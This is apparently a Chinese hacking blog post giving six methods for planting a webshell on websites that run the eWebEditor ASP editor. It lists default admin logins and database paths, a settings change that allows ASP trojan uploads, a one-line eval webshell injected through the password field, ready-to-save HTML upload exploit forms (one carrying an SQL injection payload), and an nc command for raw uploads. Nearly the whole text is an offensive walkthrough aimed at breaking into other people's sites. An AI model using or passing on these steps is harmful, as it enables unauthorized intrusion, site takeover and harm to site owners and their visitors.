服务器 > 网络安全 > 脚本攻防

脚本入侵 入侵ewebeditor编辑器一些技巧

51人参与 2011-04-24 脚本攻防

ewebeditor编辑器
建议最好检测下admin_style.asp文件是否可以直接访问 直接到样式管理
默认后台地址:/ewebeditor/admin_login.asp
使用默认密码:admin/admin 或 admin/admin888
不行就默认数据库路径 ewebeditor/db/ewebeditor.mdb 或ewebeditor/db/%23ewebeditor.mdb
拿webshell方法第一种方法
登陆后台点击“样式管理”-选择新增样式
只写这几样 大家照做就行了
样式名称:chouxiaozi 随便写
路径模式:选择绝对路径
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
这样我们可以上各种格式的木马 我们只要把木马改成添加的这些格式就可以了
上传路径:写上这个admin/ 或写/ 免的别人把uploadfile/目录删了 我们找不到马
内容路径:空 记得
图片限制:写上1000 免的上不了我们的asp木马
然后我们就可以提交了
就可以看到样式增加成功!
然后我们按-返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
然后按-按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
在返回样式管理-找到刚才添加的样式名称-按预览-这里回看到一个正方形的东西 我们点击
然后上传我们的刚才添加的格式的木马

拿webshell方法第二种方法
登陆后台,点击修改密码---新密码设置为 1":eval request("choxiaozi")’
设置成功后,访问asp/config.asp文件即可,一句话木马被写入到这个文件里面了.
然后用一句话客户端连接
拿webshell方法第三种方法
ewebeditor不登陆也获得webshell 这就不多说了 大家去百度搜索 ewebeditor不登陆也获得webshell
下载教程看

拿webshell方法第四种方法
利用ewebeditor asp版 2.1.6 上传漏洞利用程序
首先先看ewebeditor/upload.asp 上传地址存在不
存在的话就把下面的代码保存为
h1>ewebeditor asp版 2.1.6 上传漏洞利用程序----</h1><br><br>
<form action="这里写上传地址?action=save&type=image&style=luoye' union select s_id,s_name,s_dir,s_css,s_uploaddir,s_width,s_height,s_memo,s_issys,s_fileext,s_flashext, [s_imageext]%2b'|cer',s_mediaext,s_filesize,s_flashsize,s_imagesize,s_mediasize,s_stateflag,s_detectfromword,s_initmode,s_baseurl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=fuck>
</form>
改上传地址保存为chouxiaozi.htm文件,打开可以直接上传cer文件,测试成功.上传后地址看源文件
就可以看到我们上传的路径和地址
拿webshell方法第五种方法
ewebeditor 鸡肋的上传漏洞
首先先看下ewebeditor/asp/upload.asp 上传地址存在不
存在就
把下面的代码
<form action="这里写上传地址?action=savetype=image&style=popup&cusdir=a.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>
然后保存为chouxiaozi.html
打开可以直接上传gif文件,测试成功.上传后地址看源文件
就可以看到我们上传的路径和地址
拿webshell方法第六种方法
利用ewebeditor/upload.asp
抓包和nc上传
抓包cookies 参数 和文件的数据 然后保存成文本 比如chouxiaozi.txt
然后用编译c32asm 或等等编译工具 修改
然后用nc.exe 提交 命令nc -vv site 80<chouxiaozi.txt
不懂抓包和nc上传 百度搜索相关教程
回头说下有时候进了个网站后台-看到了ewebeditor编辑器 但是找不到ewebeditor目录地址
我们来点鼠标右键-查看源代码,找到仔细找ewebeditor的路径。
(0)
打赏 微信扫一扫 微信扫一扫

您想发表意见!!点此发布评论

推荐阅读

脚本入侵 ASP网站入侵常用的一些技巧分享

04-24

浅说双引号被过滤时一句话的插入与防范

04-01

脚本入侵-上传漏洞总结篇(臭小子)

04-24

upfile asp文件上传 又一奇迹般的突破

04-01

防止网站被JS,iframe挂马的防范方法

05-01

php注入基本步骤小结

04-01

猜你喜欢

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论